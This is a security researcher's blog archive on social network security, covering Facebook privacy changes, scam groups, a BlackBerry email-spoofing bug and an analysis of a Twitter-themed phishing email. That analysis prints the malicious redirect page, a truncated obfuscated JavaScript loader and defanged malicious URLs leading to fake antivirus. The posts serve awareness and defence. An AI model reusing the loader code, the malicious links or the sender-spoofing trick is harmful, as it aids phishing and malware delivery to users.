Tag Archives: socnetsec

Two New Social Media Security White Papers Released

0
Filed under Social Networks
Tagged as , , , , , , , , , ,

My employer (SecureState) has released two white papers as part of our Social Media Security Awareness Month.  You can also download some cool wallpaper for this month created by Rob our graphic designer (see the picture on the right).  :-)

First is some research several of my colleagues and I worked on.  The paper is titled: “Profiling User Passwords on Social Networks”.  The paper discusses the password problem that we all know and love as well as how you can determine passwords by what individuals post on their profiles.  We dive into tools from Robin Wood, Mark Baggett and others that can be used to pull keywords from profiles and other sources to create wordlists.  These wordlists can be used for brute force attacks on user accounts.  Next, we look at password complexity of several popular social networks with some research around brute force controls that some of the social networks have implemented, or in some cases haven’t.  Lastly, we discuss some things that users of social networks can do when choosing passwords.  You can download my paper here.

The other paper released is titled: “Security Gaps in Social Media Websites for Children Open Door to Attackers Aiming To Prey On Children” by my colleague Scott White.  In his paper he looks at the security of social media websites specifically designed for children.  This is some very detailed research and sheds some light on how predators are using these sites to target children as well as some issues that are unique to these types of social media websites.  You can download Scott’s paper here.

Speaking of social media…I’ll be presenting “Social Impact: Risks and Rewards of Social Media” at the Information Security Summit this Friday at 10am.  I’ll have the slide deck posted shortly after the conference.

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Hacking Your Location With Facebook Places

1
Filed under Social Networks
Tagged as , , , , ,

I just published a post over on the SecureState blog about how to hack your location using Facebook Places.  The post brings up some interesting questions about how social networks are going to have a problem with fake location check-in’s. In the meantime, it’s a way to have fun with your friends…:-)

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Interesting New Twitter Phish Can Lead to Bad Places

0
Filed under Malware, Social Networks
Tagged as , , , ,

I’ve had several fake emails that initially look like they come from Twitter in my email recently.  I didn’t think anything of it until several of my friends forwarded me the same type of emails.  This suggests two things.  One, that these emails are starting to hit a larger audience.  Or two, they are targeting just my friends and I which is totally possible. :-) Anyway, here is a quick bit of analysis of one of these emails.  I found some interesting things when I investigated the website linked in the fake email.  The link in this particular could have done more damage if it wasn’t for some crappy attacker code.  Read on!

The Email
The following screen shot shows you what the email looks like.  It seems to come from Twitter but you will notice that there are some interesting clues that tell you this isn’t real.  First, the Twitter account mentioned is just the first part of the email address this was sent to.  This may or may not be your Twitter ID.  Second, check out the “Britney Spears home video feedback” subject line and “Antidepressants for your bed vigor” bold red in the message body.  Yep.  All the signs that this isn’t from Twitter.  Ok, nothing to see here right?

The Link
When you look at the source of the email, the link actually goes to “hxxp://89.161.148.201/cekfcq.html”. If you do click on this link several things happen:

An HTML page is loaded which redirects you to a shady Russian software site.  This site (software-oemdigital.ru) has a ton of phisy looking domains that were assigned to it since 6/11/2010.  The HTML file also loads a script which runs a PHP file on another server.  Let’s take a look at the response:

HTTP/1.0 200 OK
Connection: close
Content-Length: 250
Content-Type: text/html
Date: Wed, 23 Jun 2010 15:09:53 GMT
Last-Modified: Wed, 23 Jun 2010 08:30:01 GMT
Server: IdeaWebServer/v0.70

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>

<META HTTP-EQUIV=”refresh” CONTENT=”0;URL=hxxp://software-oemdigital.ru”>
<title></title>

<html><head>
</head></html><script src=hxxp://eurolisting.net/Cgi-bin/markprint.php ></script>

The Russian software site loads as normal but something else is going on in the background from eurolisting.net and that PHP file.  Here is the response:

HTTP/1.1 200 OK
Connection: close
Date: Wed, 23 Jun 2010 17:46:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1287414902; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/javascript

// <script>
function cxx(wcH){return wcH.replace(/%/g,”).replace(/['ow:Y]/g,fUp)}
cPH7j=’d:6fcY75meY6et.Y77rio74w65(Y22o3cdiv stylew3d:5cY22pw6fsitio6fnY3aaw62so6fl:75o74Y65o3b lefto3a:2d1000pxY3bw20tY6fp:3aw2d10w300pxw3bo5cw22:3ew22Y29w3b:66unctiY6fn :6973(a)o7bdY6fcu:6deY6et.w77rw69te(:22:3cifrao6d:65w20srcw3do5co22httw70Y3ao2f <SNIP>

All of the stuff following the script tag is obfuscated JavaScript.  I cut most of it out as it is quite lengthy.  Running this through jsunpack (a JavaScript unpacker) the script tries to load several things including some VBScript that seems to check for system properties, if you are running Firefox and if you have Java and/or Flash enabled as well as what seems to be a check for Adobe Reader plug-ins.  You can check out the script and the unpacked version over at the jsunpack site.

Now this is where it gets interesting.  In Internet Explorer the PHP file seems to generate a request to a URI that doesn’t exist: hxxp://89.161.148.201/zzz/ttt/ad3740b4.class, it 404′s.  You can also see this in the Wireshark capture below:

In Firefox it’s a different story.  The Russian software site still loads and something else attempts to get requested:

hxxp://wiki.insuranceplanningaz.com/main.php?h=89.161.148.201&i=JcmridQaq/ykgRj4UMpOy5Ec&e=4

This site will lead to some fun “fake AV” which prompts you to download a “setup.exe” file.

You probably don’t want to run that file.  The good news is that if you have the latest version of Firefox it will note this as a reported web forgery and tries to prevent you from going there.  One problem I see is that if you are running an older version of Firefox you might not get this notification.  I haven’t tested this with other browsers but your results may vary.

What does this all mean?  Well of course don’t click on shady emails like this.  You know better right?  Also, don’t think that because you use Firefox you are safe from attacks like these!  Attackers are catching on and I would suspect we will see more attacks targeting multiple browsers besides IE.  Wait, too late isn’t it?  Special thanks to Greg and Tyler for providing intel about these domains and some of the analysis.

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Facebook Privacy & Security Guide Updated to v2.2

0
Filed under Social Networks
Tagged as , , , ,

I have updated the Facebook Privacy & Security Guide to version 2.2 over on SocialMediaSecurity.com.  If you’re not familiar with the guide it is an easy to use guide which helps you set the recommended privacy and security settings on your Facebook account.  It’s free, printable and meant to be shared.

This update includes details on all the recent changes to Facebook’s privacy settings that went live May 26, 2010.  I have also included more information on “Instant Personalization”, removing yourself from “Platform”, and how your public information can be accessed via the Facebook Graph API.  Note that you may not have these settings enabled on your Facebook profile…yet.  They are slowly being rolled out to the Facebook user base and may take a few weeks.  Please share with friends, family and others!

Download the latest version of the Facebook Privacy & Security Guide here.

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

My Thoughts on the New Facebook Privacy Controls

0
Filed under Privacy on the Internetz, Social Networks
Tagged as , , , ,

Ever since I started the Facebook Privacy & Security Guide back in October 2008 I knew that Facebook’s privacy settings were confusing for the average user.  Many of my concerns back then centered around friends and family that had no idea there were even privacy settings to configure on Facebook.  It has also never been in Facebook’s financial interest to *really* show you how to protect the information you post.  These are all reasons was why I started the guide and hopefully over the last few years it has helped spread some awareness on how to control the information you post a little better.  Working on the guide has been frustrating at times because Facebook would make settings more confusing, remove settings that were useful and then bring them back again in some other form.  In the latest versions of the guide I often wondered how I was going to fit all the settings and their explanations into a two-sided handout.  The handout format has always been important to me so it could be easily distributed. :-)

Jumping forward to today we see yet another iteration of these settings.  I don’t have the settings on my Facebook account yet so I haven’t updated the guide but I have read some of the information already out there.  The EFF has a good post up about the new settings.  They even have a YouTube video showing you the changes and their recommendations.  The other post you should read is one by theharmonyguy who, as always, has very good analysis of these settings and Facebook overall.

My thoughts are pretty much along the same lines as the EFF and others.  However, I will say that no matter what changes Facebook makes to their privacy settings they *will* find ways to use your information to make money.  This is Mark Zuckerberg’s business model and that won’t change anytime soon.  I will leave you with a fantastic quote that I think sums up all the media drama leading up to these new privacy controls.  This is a quote from Bruce Schneier.  It’s from an article he did for Forbes regarding statements that “Privacy is Dead”:

“It’s just not true. People, including the younger generation, still care about privacy. Yes, they’re far more public on the Internet than their parents: writing personal details on Facebook, posting embarrassing photos on Flickr and having intimate conversations on Twitter. But they take steps to protect their privacy and vociferously complain when they feel it violated. They’re not technically sophisticated about privacy and make mistakes all the time, but that’s mostly the fault of companies and Web sites that try to manipulate them for financial gain.”

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Privacy and Security of Open Graph, Social Plugins and Instant Personalization on Facebook

2
Filed under Social Networks
Tagged as , , , , , , ,

As most major news organizations and blogs have covered the changes that Facebook has made from a high level, I wanted to focus this post specifically on Facebook’s “Open Graph”, “Social Plugins” and “Instant Personalization”.  In my opinion, these are three changes that will significantly impact the way you and your friends use Facebook.  As I usually do, I will provide a point of view from the eyes of an attacker.  As we all know, its only a matter of time before these new features begin to be abused by attackers.

Open Graph
The first significant change is Facebook’s “Open Graph”.  Open Graph is a significant departure from Facebook’s previous data connection strategy which used to be centered around Facebook Connect.  All of that is gone and replaced with Open Graph.  Open Graph basically allows partner websites and Facebook applications to share your public information and the public information of your friends with each other.  The other big change which is a departure from Facebook Connect is that developers can hold your data indefinitely.  The requirement was previously only for 24 hours (and we all know developers weren’t really holding to that anyway).

What’s also interesting is that Facebook has implemented an API called the Graph API. The Graphs API is how developers can easily integrate their applications with this new stream of user data.  In fact, now you don’t even need a Facebook account to search the Open Graph.  For example, https://graph.facebook.com/search?q=facebook&type=post will show you 25 recent status updates.  Note that these status updates are set to Everyone and it seems that Facebook has put a limit on data you can retrieve with one query (this will change most likely or you can figure out ways around this).  Before you had to log in to Facebook to do a search or use some creative Google queries for this information.  This is good news for attackers, spammers and data miners.  Facebook has made publicly available information even easier to search for and in my opinion, is going to start competing with Google for personalized search results.  Stay tuned, Open Graph is going to be a huge area that I will be focusing my research on.  As a penetration tester, my job just got easier.  Thanks Facebook! :-)

Social Plugins
Social plugins are small bits of code (the “Like” button for example) that you probably have been seeing all over the web.  What Facebook has done is added simple plugins that web site developers can easily integrate.  Also note that there are many more plugins available besides the “Like” button.  Simply run the wizard, fill in a few lines and you’re done.  Lets take the “Like” button as an example.  If you are signed into Facebook (or not) you will see the button just like you do on Mashable:

Clicking on the button while you are signed in to Facebook posts a notice to your news feed that you like Mashable.  The button also works when you are not logged into Facebook by prompting you to sign in.  This is similar to how Facebook Connect worked.  If you want to “unlike” the page, simply click the “Like” button again.  Already, someone has found a potential security problem with the “Like” button that could possibly be abused by spammers.  Keep in mind that these social plugins are part of Facebook’s strategy to take over the world integrate their Open Graph protocol.  Once Open Graph starts to be more popular, you will see lots more attacks leveraging these new plugins.

Instant Personalization
Lastly, we have “Instant Personalization”.  Instant Personalization is the feature in which Facebook has “pre-approved” third-party web sites to gain access to your public information just by visiting them.  There is very little information available currently on how Facebook approves third-party sites.  Once you allow these sites full authorization, they have the same access that any developer would have to your Facebook information.  For example, here is what it looks like when you surf to Yelp.  You will get a pretty blue bar that shows up at the top of your browser window:

You should notice that you have the option to “Learn More” or say “No, thanks”.  You will also notice how instantly, if any of your friends on Facebook are using Yelp you can see any of their activity just below the blue bar.

Now something interesting happens once you visit one of these pre-approved sites.  I noticed that a Facebook application (in this case Yelp) gets installed and allows it permissions to post.  You don’t have to even click “No thanks”, the application is already installed.  Pandora and Microsoft Docs work the same way.  In fact, when testing the Microsoft Docs personalization I noticed the Facebook application that gets installed sets its privacy permissions to EVERYONE and allows one-line posts on your behalf.  This means that anyone can see any activity that is posted by that application.  Keep in mind that these controls are all being closely looked at by attackers and I suspect that we will see some hacks and/or abuse of this new personalization system soon.

Instant Personalization Privacy Settings
Facebook has put in a global “opt-out” check box in your privacy settings.  Of course in typical Facebook fashion they have buried this setting so it’s hard to find.  Ironically, just as I was writing this post Facebook changed the location of this setting.  So now you have to go down one more level by clicking an additional button to get to the setting (see the screen shot below).

There are some very important caveats about this setting.  First, this setting is enabled by default. Yes, that’s right.  If you have a Facebook account this setting is checked right now and you are opted in.  I had thought that Facebook would have learned from the Beacon fiasco but it appears they haven’t.  Secondly, just because you “opt-out” doesn’t mean your information is safe.  Just like other Facebook applications if your FRIENDS use Yelp, Pandora or Microsoft Docs these sites can still get your public information or anything else you have made available to be shared with friends.  To completely opt-out you need to MANUALLY block each and every application (in this case Yelp, Pandora and MS Docs).  It goes without saying, this is a huge pain and I look forward to the long list of complaints and privacy concerns regarding this psudo opt-out.  The other problem is that I have already seen posts by Facebook that they already have partner sites that they are going to announce soon.  What this means is that if you want to truly “opt-out” you need to keep up to date on all the new third-party partners with Facebook and manually block their applications.  This is a terrible control in my opinion.

So where are these settings?  Click on Account –> Privacy Settings –> Applications and Websites –> Instant Personalization (Click the Edit Settings button).  In the screen shot below you can see the box that you need to uncheck.

UPDATE: Yvan Boily on Twitter had mentioned that you should also uncheck every box under “What your Friends can share about you” in your privacy settings (in my guide on SocialMediaSecurity.com this is what I recommend as well).

I will be updating my Facebook Privacy & Security Guide over on SocialMediaSecurity.com to reflect all of these changes soon.  In the meantime, tell your friends on Facebook about these settings and check out a few other good articles on the recent changes.  Here are three articles I recommend reading: Pros and Cons of Today’s Facebook Announcements by theharmonyguy, How to Opt Out of Facebook’s Instant Personalization (with a nice video walk-through) by the EFF and Facebook Open Graph: What it Means for Privacy by Mashable.

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Facebook SPAM on BlackBerry Devices

2
Filed under Mobile Security, Social Networks
Tagged as , , , , ,

I always thought the Facebook Application for BlackBerry was a buggy, slow piece of junk.  Now I have noticed that this application is being abused by spammers to propagate Viagra and Percocet SPAM.  The screen shot to the right is an actual Facebook notification I received on my BlackBerry.

There seems to be an interesting bug in the Facebook Application for BlackBerry in which a spammer can spoof the “facebookmail.com” domain to have SPAM messages show up in your notifications list within the BlackBerry Facebook application.  This only works if you have the Facebook for BlackBerry Application installed AND you have an email account configured on your BlackBerry (yes, this includes a corporate email account as well).  The email account you have configured on your BlackBerry is where you actually receive the SPAM message, not through Facebook.

The Facebook Application for BlackBerry appears to notify on any new email in one of your BlackBerry mailbox’s with “*.facebookmail.com” in the sender or return-path field.  This is a win for the spammer because now you think Facebook is spamming you and with the addition of an email, you’re more tempted to click on the link.  The Facebook Application for BlackBerry is no stranger to controversy and this particular bug has been noticed recently by others as well.  It also appears that this bug only affects the BlackBerry Facebook application.  When testing the iPhone app I couldn’t replicate the issue.

To test this bug I used EXIM4 in Ubuntu as a mail relay with mailtools to send the email.  This allowed me to send a spoofed email as “agent0x0@facebookmail.com” to one of the email accounts I have configured on my BlackBerry.  Here are screen shots of the spoofed email in my inbox and what it looks like in the Facebook Application for BlackBerry:

My opinion is that a mobile Facebook application should never be polling your personal email for these messages…but then again this could be a “feature” of this nicely designed application, right? :-)  Special thanks to Kevin Johnson for helping with some of the research/testing.

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Beware of Evil Facebook Groups

1
Filed under Social Networks
Tagged as , , , , ,

Some of my Facebook friends are probably wondering why I would fall into the trap of the magical “dislike button” hype that seems to be sweeping across Facebook right now.  In a little social experiment and hopefully an awareness exercise for some of my non-security friends I created a Facebook group based off of similar ones I have seen called The REAL Dislike Button™ is Finally Here! Add it Now!.  The group is harmless even if it looks like there is scary JavaScript code in the instructions to “turn your friends blue”.  If you click on the link it takes you to one of my favorite YouTube video’s.  :)

The point is that these fake groups are targeting Facebook users thinking that Facebook has these new “features” like a dislike button and even ones like “see who viewed your profile”.  Folks, these techniques and/or modifications to Facebook don’t exist.  Sorry.  Just in the last week I have seen more and more of my Facebook friends sharing links to these groups.  Almost all of the groups I have looked at that were being shared lead to very bad places which I will demonstrate below.

Example #1 – The Typical “Get the DISLIKE BUTTON” Scam
In this example we have one of *many* groups that promise you the uber magic secret “dislike” button if you just join the group, invite your friends to do the same and follow some strange link off to Neverland.  This group has 1,162,238 members.  I wish I was making that number up.

The first thing you will notice is that there is a link to a Facebook profile they want you to friend.  That profile was deleted (your first clue).  Next, they want you to check out a link in Step 5.  That link sends you here:

Which will eventually install some nasty adware/spyware on your Windows machine called Adware.Mywebsearch.DV.  It’s not easy to get rid of.

In a similar group like the one above with a mere 697,375 members the last link takes you to this:

If you go through with entering in your cell phone number and getting the confirmation code per the instructions you have just signed up for a monthly charge to your cell phone account to the tune of $9.99 per month.  The monthly charge details is in the very tiny text you can hardly read.  Nice.  But wait, if you were smart enough to try and close the quiz window, you get this pop-up:

Really?  Hopefully you don’t fall for that one even though it shows your real city.

Example #2 – The Typical “See everyone who viewed your profile” Scam

This is one of my favorites as this is another impossible feat of Facebook technology.  Here is what the screen shot look like:

Note the PhotoShop job on the notification window showing who has “viewed” your profile.  Clicking on the bit.ly link leads you to another quiz application or adware/spyware or other forms of dangerous malware.  Don’t worry, there are *lots* of these groups out there. Good times.

So the lesson here is…don’t click on anything in these groups that tempt you with magical Facebook powers!  If it seems too good to be true, it probably is!

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

Twitter: You’re Doing It Wrong!

0
Filed under Social Networks
Tagged as , , , ,

I see some crazy, mind blowing things posted by people on social networks but this recent tweet I saw might take the cake.  It’s one thing to post something on Facebook where you have the ability to lock down who might see your status updates but Twitter has very little control over this.  In fact, if you post something to Twitter (even with a private profile) it can be re-tweeted and/or copied by your friends.

Regardless of settings I think that there are just *stupid* people using social networks.  In fact, I think that even if social networks didn’t exist these people would still be classified as ones with “no brain cells” (no pun intended with this example).  For example, here is tweet from a girl talking about a job interview she has scheduled with some company:

fail_twitter1

Now if that wasn’t bad enough…check out her profile picture:

fail_twitter2

I have nothing else to say but…FAIL.  Perhaps this is the start of a new series of blog posts.  :-)

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS

New Facebook Privacy Settings: For Better or For Worse?

7
Filed under Privacy on the Internetz, Social Networks
Tagged as , , , , , , , , ,

Everyone has probably already heard that Facebook rolled out new privacy settings today.  If you haven’t seen them or gotten the following pop-up box on login…you will soon:

message1

There are a great deal of articles already out about how this is such a great improvement and how these new settings give you more control over your privacy.  However, I would argue that these settings may possibly open up more issues then they are trying to prevent.  The best article on the new settings and the privacy implications is the one that the Electronic Frontier Foundation (EFF) released today titled: Facebook’s New Privacy Changes: The Good, The Bad, and The Ugly.  I recommend everyone (no pun intended) read this article as it provides much more detail then I will provide in this post.

What I want to do is provide you with a summary of the good and the bad of the new privacy settings.  I also want to give a security professional’s point of view on these settings.  As a penetration tester I can tell you that my job just got way easier!  You may have read my series on Enterprise Open Source Intelligence Gathering in which I tell you how you can find information on social networks about your company and employees.  Well, searching for information on Facebook just got easier thanks to status updates being available using new technology like Google Real-time Search!  Ok, on to the better and the worse!

The Better?

  • The new way privacy settings are “managed” is a good thing.  It’s easier to find and navigate through the settings.
  • I like that they ask you for your password to change privacy settings.  It’s just another layer.  Now, this doesn’t help much if you have a keylogger installed but it seems they put this in to prevent bots that may have taken over your account access to your settings.  Again, not fool proof but another layer.
  • The ability to fully customize privacy settings on all the content you post.  So for example, you can specify if you want everyone on the Internet to view your status updates (more on that in a minute) or Friends, Friends of Friends and Custom.
  • Users are now somewhat “forced” to check out their privacy settings.  It’s more accessible that’s for sure.

The Worse?

  • Your Name, Profile Picture, Gender, Current City, Networks, Friend List, and Pages are all available to be viewed by EVERYONE on Facebook! You cannot change these settings at all.  Note, there is a way to remove your entire Friends List from your profile but it’s all or nothing!  Here is a screen shot of this. You have to set it in your profile page using the “edit” button and check the box.These changes are quite disturbing considering that you used to be able to restrict this type of information.  I really believe that Facebook has done this on purpose so *more* information is being shared about you while stating “enhanced” more granular privacy settings.  If you have been to one of my talks in the past I always mention that social networks need to find ways to make money.  The way they make money is off of the information you share!  If you don’t get a choice about the basic information anymore…that’s more money in their pocket at the expense of your privacy.
  • What about the security ramifications of this? It opens up a whole new world for cyberstalking, predators and other attackers.  If you were someone that didn’t feel comfortable sharing this information in the first place, your choice is gone.  Sure, you can lock down your profile so no one can search for you but if you do that…why are you on Facebook to begin with?  You *have* to let your real friends search for you at some point!
  • By default Facebook “suggests” that you set your status updates to “Everyone”.  Here is the thing with status updates….Everyone means everyone on the Internet!  This is where new technology like Google RTS comes into play.  Imagine how easy it will be to find the latest information on “Tiger Woods” or now everything YOU are saying on Facebook, Twitter and other social networks.  Enter in some social engineering and things just got easier for attackers looking to use you or your information (which is easy to figure out now that I can see your friends, and things that interest you via the pages your a fan of).
  • Lastly, Facebook removed the ability to prevent Facebook applications your friends installed from pulling your “public” information.  That option is now gone and applications that your friends install can now view your “public” info.  Remember kids, “public” info is now: Your Name, Profile Picture, Gender, Current City, Networks, Friend List, and Pages.

One final note…be sure to double check all your privacy settings after you run the wizard.  I found a few settings that reverted back to settings I never had.  So what are your thoughts?  Will this make you lock your profile down more?  Do you care?  Is privacy dead anyway? Will Zombies destroy us all? :-)

Share and Enjoy

  • Facebook
  • Twitter
  • Delicious
  • Digg
  • StumbleUpon
  • Add to favorites
  • Email
  • RSS